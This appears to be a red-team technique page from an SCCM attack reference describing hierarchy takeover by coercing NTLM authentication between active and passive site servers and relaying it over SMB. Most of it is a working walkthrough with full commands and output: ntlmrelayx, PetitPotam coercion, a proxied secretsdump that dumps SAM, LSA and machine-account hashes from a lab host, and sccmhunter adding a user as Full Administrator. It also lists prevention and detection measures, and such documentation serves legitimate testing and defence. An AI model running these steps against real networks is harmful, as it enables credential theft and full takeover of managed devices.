Hierarchy Takeover via NTLM coercion and relay to SMB between primary and passive site servers
- Valid Active Directory domain credentials
- Connectivity to SMB (TCP/445) on a coercion target:
- TAKEOVER-7.1: Coerce primary site server
- TAKEOVER-7.2: Coerce passive site server
- Connectivity from the coercion target to SMB (TCP/445) on the relay server
- Coercion target settings:
BlockNTLM=0or not present, or =1andBlockNTLMServerExceptionListcontains attacker relay server [DEFAULT]RestrictSendingNTLMTraffic=0,1, or not present, or =2andClientAllowedNTLMServerscontains attacker relay server [DEFAULT]
- Domain controller settings:
RestrictNTLMInDomain=0or not present, or is configured with any value andDCAllowedNTLMServerscontains coercion target [DEFAULT]
- Connectivity from the relay server to SMB on target host
- SMS Provider role installed on target preferred (default) but not required
- Relay target settings:
RequireSecuritySignature=0or not present [DEFAULT]RestrictReceivingNTLMTraffic=0or not present [DEFAULT]- Coercion target is local admin (to access RPC/admin shares) [DEFAULT]
- Domain controller settings:
RestrictNTLMInDomain=0or not present, or is configured with any value andDCAllowedNTLMServerscontains relay target [DEFAULT]LmCompatibilityLevel<5or not present, or =5and LmCompatibilityLevel >=3on the coercion target [DEFAULT]
For high availability configurations, the passive site server role is deployed to SCCM sites where redundancy for the site server role is required. A passive site server shares the same configuration and privileges as the active site server yet performs no writes or changes to the site until promoted manually or during an automated failover.
During setup, the passive site server is required to be a member of the active site server's local Administrators group. An attacker who is able to successfully coerce NTLM authentication from a active or passive site server via SMB and relay it to SMB on a remote active or passive site server to compromise the host can either:
- Authenticate to its own hosted SMS Provider as the site server
- Authenticate to LDAP(s) as the site server and configure resource-based constrained delegation (RBCD) to impersonate an SCCM Full Administrator
The "Full Administrator" security role is granted all permissions in Configuration Manager for all scopes and all collections. An attacker with this privilege can execute arbitrary programs on any client device that is online as SYSTEM, the currently logged on user, or as a specific user when they next log on. They can also leverage tools such as CMPivot and Run Script to query or execute scripts on client devices in real-time using the AdminService or WMI on an SMS Provider.
- DETECT-1: Monitor site server domain computer accounts authenticating from another source
- DETECT-5: Monitor group membership changes for SMS Admins
- DETECT-5: Monitor group membership changes for RBAC_Admins table
- PREVENT-12: Require SMB signing on site systems
- PREVENT-20: Block unnecessary connections to site systems
- TAKEOVER-7.1: Coerce primary site server
- TAKEOVER-7.2: Coerce passive site server
The steps to execute TAKEOVER-7.1 and TAKEOVER-7.2 are the same except the coercion target and relay target are opposite. This example is for TAKEOVER-7.1.
-
Use
SCCMHunterto profile SCCM infrastructure:The results of the
findmodule indicate:- The SCCM.INTERNAL.LAB and PASSIVE.INTERNAL.LAB sytems are both site servers in the "LAB" site
- The SCCM.INTERNAL.LAB host is the active site server and the PASSIVE.INTERNAL.LAB host is the passive site server
- SMB signing is disabled on both systems
[04:24:43 PM] INFO [+] Finished profiling Site Servers. [04:24:43 PM] INFO +----------------------+-------------------+-----------------+--------------+---------------+----------+-----------+---------+ | Hostname | SiteCode | SigningStatus | SiteServer | SMSProvider | Active | Passive | MSSQL | +======================+===================+=================+==============+===============+==========+===========+=========+ | sccm.internal.lab | LAB | False | True | True | True | False | False | +----------------------+-------------------+-----------------+--------------+---------------+----------+-----------+---------+ | passive.internal.lab | LAB | False | True | True | False | True | False | +----------------------+-------------------+-----------------+--------------+---------------+----------+-----------+---------+ -
On the attacker relay server, start
ntlmrelayx, targeting the SMB service on the primary site server identified in the previous step. The-socksflag is used to hold the authenticated session open:└─# python3 ntlmrelayx.py -t smb://TARGET_SITE_SERVER -smb2support -socks Impacket v0.10.1.dev1+20230802.213755.1cebdf31 - Copyright 2022 Fortra [*] Protocol Client SMB loaded.. [*] Protocol Client IMAPS loaded.. [*] Protocol Client IMAP loaded.. [*] Protocol Client RPC loaded.. [*] Protocol Client DCSYNC loaded.. [*] Protocol Client MSSQL loaded.. [*] Protocol Client LDAPS loaded.. [*] Protocol Client LDAP loaded.. [*] Protocol Client SMTP loaded.. [*] Protocol Client HTTPS loaded.. [*] Protocol Client HTTP loaded.. [*] Running in relay mode to single host [*] SOCKS proxy started. Listening at port 1080 [*] IMAPS Socks Plugin loaded.. [*] MSSQL Socks Plugin loaded.. [*] HTTP Socks Plugin loaded.. [*] HTTPS Socks Plugin loaded.. [*] SMB Socks Plugin loaded.. [*] IMAP Socks Plugin loaded.. [*] SMTP Socks Plugin loaded.. [*] Setting up SMB Server [*] Setting up HTTP Server on port 80 * Serving Flask app 'impacket.examples.ntlmrelayx.servers.socksserver' * Debug mode: off [*] Setting up WCF Server [*] Setting up RAW Server on port 6666 [*] Servers started, waiting for connections -
From the attacker host, coerce NTLM authentication from the passive site server via SMB, targeting the relay server's IP address:
┌──(root㉿DEKSTOP-2QO0YEUW)-[/opt/PetitPotam] └─# python3 PetitPotam.py -u lowpriv -p P@ssw0rd <NTLMRELAYX_LISTENER_IP> <PASSIVE_SITE_SERVER_IP> Trying pipe lsarpc [-] Connecting to ncacn_np:passive.internal.lab[\PIPE\lsarpc] [+] Connected! [+] Binding to c681d488-d850-11d0-8c52-00c04fd90f7e [+] Successfully bound! [-] Sending EfsRpcOpenFileRaw! [-] Got RPC_ACCESS_DENIED!! EfsRpcOpenFileRaw is probably PATCHED! [+] OK! Using unpatched function! [-] Sending EfsRpcEncryptFileSrv! [+] Got expected ERROR_BAD_NETPATH exception!! [+] Attack worked!After a few seconds, you should receive an SMB connection on the relay server that is forwarded to the SMB service on the site server and the authenticated session is held open:
Type help for list of commands ntlmrelayx> [*] SMBD-Thread-9 (process_request_thread): Received connection from 10.10.100.141, attacking target smb://10.10.100.121 [*] Authenticating against smb://10.10.100.121 as LAB/PASSIVE$ SUCCEED [*] SOCKS: Adding LAB/PASSIVE$@10.10.100.121(445) to active SOCKS connection. Enjoy [*] SMBD-Thread-10 (process_request_thread): Connection from 10.10.100.141 controlled, but there are no more targets left! [*] SOCKS: Proxying client session for LAB/PASSIVE$@10.10.100.121(445) -
Proxy
secretsdump.pyin the context of the passive site server through the authenticated session to authenticate to the primary site server and recover its hashed credential:┌──(root㉿DEKSTOP-2QO0YEUW)-[/opt/PetitPotam] └─# proxychains secretsdump.py lab/passive\$@sccm.internal.lab [proxychains] config file found: /etc/proxychains4.conf [proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4 [proxychains] DLL init: proxychains-ng 4.16 Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation Password: [proxychains] Strict chain ... 127.0.0.1:1080 ... 10.10.100.121:445 ... OK [*] Target system bootKey: 0x436a3e67c2c89ded60aeb1f1819428c8 [*] Dumping local SAM hashes (uid:rid:lmhash:nthash) Administrator:500:aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:003d349493bc6acfb242ae5c2ff3d819::: [*] Dumping cached domain logon information (domain/username:hash) INTERNAL.LAB/Administrator:$DCC2$10240#Administrator#dfb35a65f92d8af602f08e358a58dc42 [*] Dumping LSA Secrets [*] $MACHINE.ACC lab\SCCM$:aes256-cts-hmac-sha1-96:76bf72e59677dfe072fd6609ccdc1343d318f7cc557b25588b36046747f80172 lab\SCCM$:aes128-cts-hmac-sha1-96:b2d7f1a79de08211ae6a518c82a715f4 lab\SCCM$:des-cbc-md5:5de98a07aefb983e -
Use
sccmhunteras the primary site server to the Administration Service API and add an arbitrary user as Full Administrator:┌──(root㉿DEKSTOP-2QO0YEUW)-[/opt/sccmhunter] └─# python3 sccmhunter.py admin -u sccm\$ -p aad3b435b51404eeaad3b435b51404ee:6963d86f6d65497d7b2126d44e6cdb4e -ip 10.10.100.121 [06:53:08 PM] INFO [!] Enter help for extra shell commands () C:\ >> show_admins [06:53:11 PM] INFO Tasked SCCM to list current SMS Admins. [06:53:11 PM] INFO Current Full Admin Users: [06:53:11 PM] INFO lab\Administrator () (C:\) >> get_user specter [06:53:13 PM] INFO [*] Collecting users... [06:53:13 PM] INFO [+] User found. [06:53:14 PM] INFO ------------------------------------------ DistinguishedName: CN=specter,OU=DOMUSERS,DC=internal,DC=lab FullDomainName: INTERNAL.LAB FullUserName: specter Mail: NetworkOperatingSystem: Windows NT ResourceId: 2063597574 sid: S-1-5-21-2391214593-4168590120-2599633397-1109 UniqueUserName: lab\specter UserAccountControl: 66048 UserName: specter UserPrincipalName: specter@internal.lab ------------------------------------------ () (C:\) >> add_admin specter S-1-5-21-2391214593-4168590120-2599633397-1109 [06:53:19 PM] INFO Tasked SCCM to add specter as an administrative user. [06:53:19 PM] INFO [+] Successfully added specter as an admin. () (C:\) >> show_admins [06:53:20 PM] INFO Tasked SCCM to list current SMS Admins. [06:53:20 PM] INFO Current Full Admin Users: [06:53:20 PM] INFO lab\Administrator [08:46:39 PM] INFO specter
- Chris Thompson, SCCM Site Takeover via Automatic Client Push Installation
- Garrett Foster, SCCM Hierarchy Takeover with High Availability
- Microsoft, Site server high availability in Configuration Manager